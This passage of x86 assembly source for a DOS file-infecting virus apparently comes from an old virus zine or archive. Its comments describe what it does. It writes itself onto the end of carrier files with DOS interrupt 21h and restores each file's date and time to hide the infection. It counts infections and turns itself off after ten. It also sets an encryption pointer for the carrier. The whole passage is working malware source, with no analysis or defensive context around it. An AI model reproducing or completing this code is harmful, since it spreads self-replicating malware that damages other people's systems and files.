add ax,offset infectOK - offset infect
push ax
retn
write_OK:
mov ax,es:[di+11h] ; move file pointer
mov es:[di+15h],ax ; to end of file
mov dx,offset endvirus
mov cx,bp
mov ah,40h ; concatenate carrier
pushf ; file's first few bytes
call dword ptr cs:origint21
retn
end_write_virus:
finish_infect:
mov ax,5701h ; restore file time/date
mov cx,cs:filetime
mov dx,cs:filedate
pushf
call dword ptr cs:oldint21
inc cs:infcounter
cmp cs:infcounter,10d ; after 10 infections,
jne infectOK
call cs:restoreint21pointer ; turn off virus
jmp short infectOK
errorinfect:
stc ; set error flag
jmp short exitinfect
infectOK:
clc ; clear error flag
exitinfect:
pop bp
pop di
pop es
pop ds
pop dx
pop cx
retn
endinfect:
db 0
endvirus:
int 20h
carrierencrypt:
mov word ptr cs:encryptpointer,offset encrypt
retn
end start
-------------------------------------------------------------------------------
DA